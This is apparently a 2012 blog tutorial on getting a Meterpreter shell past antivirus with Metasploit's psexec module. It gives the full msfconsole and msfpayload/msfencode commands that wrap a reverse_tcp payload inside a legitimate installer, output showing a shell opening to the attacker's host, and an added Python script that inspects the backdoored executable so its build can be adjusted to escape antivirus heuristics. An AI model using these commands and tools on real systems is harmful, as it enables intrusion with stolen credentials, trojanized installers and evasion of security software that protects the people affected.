Bypassing AV with a remote payload
Posted 2012-12-30 01:09:30

What is a payload? As the official Metasploit documentation puts it:
A payload is the piece of software that lets you control a computer system after it’s been exploited. The payload is typically attached to and delivered by the exploit. Just imagine an exploit that carries the payload in its backpack when it breaks into the system and then leaves the backpack there. Yes, it’s a corny description, but you get the picture.

Metasploit’s most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes. You can even take over the screen, mouse, and keyboard to fully control the computer. If you’re feeling particularly bad-ass, you can even turn on a laptop’s webcam and be a fly on the wall.

For local and web-delivered payload types there are already plenty of ways to get past security software: PowerShell on Windows 7, java_signed_applet for Java, AV-evasion tricks for browser exploits, and msfpayload-generated EXEs and other file formats, among others.

What about remote payloads? These days it is rare to find a PC or server without security software installed.
Take psexec as an example: once you know the target's account and password you can get a SHELL. After configuring the module, set the PAYLOAD:


    msf  exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp


Run it.


Not what you expected: no SHELL? Why? In most cases the antivirus killed it.



Try a different PAYLOAD:


    msf  exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
    PAYLOAD => windows/meterpreter/bind_tcp
    msf  exploit(psexec) > exploit

    [*] Connecting to the server...
    [*] Started bind handler
    [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
    [*] Uploading payload...
    [*] Created \lJGSOEfc.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (GkoJyXLg - "MoAih")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [-] Error: execution expired

That does not work either. At this point you can try the windows/download_exec_https download-and-execute payload, but if the EXE or VBS it fetches is not AV-evading you get the same result.
To obtain at least a temporary SHELL you can do the following:


    root@Pc:/tmp# msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=4444 R | msfencode -t exe -x /tmp/QvodSetup5.exe -k -o brk.exe -e x86/shikata_ga_nai -c 5
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    root@Pc:/tmp# file brk.exe
    brk.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
    root@Pc:/tmp#

Configure the exploit to use the custom executable:


    msf  exploit(psexec) > set EXE::Custom /tmp/brk.exe
    EXE::Custom => /tmp/brk.exe

Exploit:


    msf  exploit(psexec) > exploit

    [*] Started reverse handler on 5.5.5.1:4444
    [*] Connecting to the server...
    [*] Authenticating to 5.5.5.4:445|WORKGROUP as user 'administrator'...
    [*] Uploading payload...
    [*] Using custom executable /tmp/brk.exe, RHOST and RPORT settings will be ignored!
    [*] Created \rvUEPiZp.exe...
    [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:5.5.5.4[\svcctl] ...
    [*] Obtaining a service manager handle...
    [*] Creating a new service (cazeVsDU - "MvmIaTXVREiiMlcePrzIFKpp")...
    [*] Closing service handle...
    [*] Opening service...
    [*] Starting the service...
    [*] Sending stage (752128 bytes) to 5.5.5.4
    [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.4:1369) at 2012-12-04 19:19:49 +0800

We got a SHELL, and Qvod (the template program, kept functional by -k) is running on the target as well.


This is only one example; with set EXE::Custom you can point psexec at whatever AV-evading backdoor you have built.
For more on AV evasion, see:
http://fuzzexp.org/porting-the-public-exploits-to-metasploit.html
http://fuzzexp.org/msfpayload-and-msfencode-with-metasploit.html
http://fuzzexp.org/how-to-bypass-antivirus-with-metasploit.html
http://fuzzexp.org/msfpayload-script-msfpayload-generator-script.html
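Before pushing a build like brk.exe through EXE::Custom it is worth checking what msfencode -x <template> -k actually did to the template. The following is an added example (Python, not code from the original post or from Metasploit): it parses the PE32 section table and entry point of the template and of the generated file and reports the differences a practitioner cares about, namely whether the entry point moved, which section it now lands in, which sections were appended, which sections are RWX, and whether the template carries UPX section names (the same thing `file` reported above). The two images are constructed header-only fixtures standing in for QvodSetup5.exe and brk.exe; the name of the appended section (.text) is an assumption for illustration. For real files, read them from disk in place of the fixtures.

```python
"""Minimal PE32 section/entry-point inspector (added example, not from the post)."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
SECTION_HDR = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER


def build_pe(entry_rva, sections):
    """Construct a header-only PE32 image for offline testing (a fixture, not a real EXE).
    sections: list of (name, virtual_address, virtual_size, characteristics)."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew: PE header follows DOS header
    opt_size = 224                                 # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # Magic: PE32
    struct.pack_into("<I", opt, 16, entry_rva)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)      # ImageBase
    hdrs, raw_ptr = b"", 0x400
    for name, va, vsize, chars in sections:
        hdrs += struct.pack(SECTION_HDR, name.encode().ljust(8, b"\0"),
                            vsize, va, vsize, raw_ptr, 0, 0, 0, 0, chars)
        raw_ptr += vsize
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs


def parse_pe(data):
    """Return entry point RVA, image base and the section table of a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = pe_off + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:
        raise ValueError("only PE32 is handled here (magic 0x%x)" % magic)
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections, first = [], opt + opt_size
    for i in range(nsec):
        name, vsize, va, rawsz, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, data, first + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(errors="replace"),
                         "va": va, "vsize": vsize, "raw_size": rawsz,
                         "raw_ptr": rawptr, "chars": chars})
    return {"entry": entry, "image_base": image_base, "sections": sections}


def entry_section(info):
    """Name of the section the entry point RVA falls into, or None if it is outside all of them."""
    for s in info["sections"]:
        if s["va"] <= info["entry"] < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None


def is_upx_packed(info):
    # Same heuristic `file` uses: UPX leaves sections named UPX0/UPX1/...
    return any(s["name"].startswith("UPX") for s in info["sections"])


def rwx_sections(info):
    return [s["name"] for s in info["sections"] if s["chars"] & RWX == RWX]


def report(template_bytes, backdoored_bytes):
    """Compare template and msfencode output; every key is something AV heuristics look at."""
    t, b = parse_pe(template_bytes), parse_pe(backdoored_bytes)
    before = {s["name"] for s in t["sections"]}
    return {
        "template_packed": is_upx_packed(t),
        "template_entry_in": entry_section(t),
        "backdoor_entry_in": entry_section(b),
        "entry_moved": t["entry"] != b["entry"],
        "new_sections": [s["name"] for s in b["sections"] if s["name"] not in before],
        "rwx_sections": rwx_sections(b),
    }


# Constructed fixtures: a UPX-packed template (entry in UPX1, as UPX lays it out)
# and a build with one appended executable section holding the encoded payload.
# The appended section name ".text" is an assumption for illustration.
_UPX_SECTIONS = [("UPX0", 0x1000, 0x20000, RWX), ("UPX1", 0x21000, 0x10000, RWX),
                 (".rsrc", 0x31000, 0x1000, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)]
TEMPLATE = build_pe(0x30000, _UPX_SECTIONS)
BACKDOORED = build_pe(0x32000, _UPX_SECTIONS + [(".text", 0x32000, 0x1000, RWX | IMAGE_SCN_CNT_CODE)])

if __name__ == "__main__":
    for k, v in report(TEMPLATE, BACKDOORED).items():
        print("%-20s %s" % (k, v))
```

Read the output the way a scanner would: an entry point that moved into a freshly appended RWX section on top of a UPX-packed image is exactly the combination generic heuristics flag, so if a build gets caught this tells you which of the three to change (different template, no packer, or a build that does not append a section) before spending more encoder iterations. If `backdoor_entry_in` comes back None the entry point lies outside every section and the file will not even start, let alone keep the template running as -k promises.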





Play a thousand tunes and you will understand music; examine a thousand swords and you will know weapons.
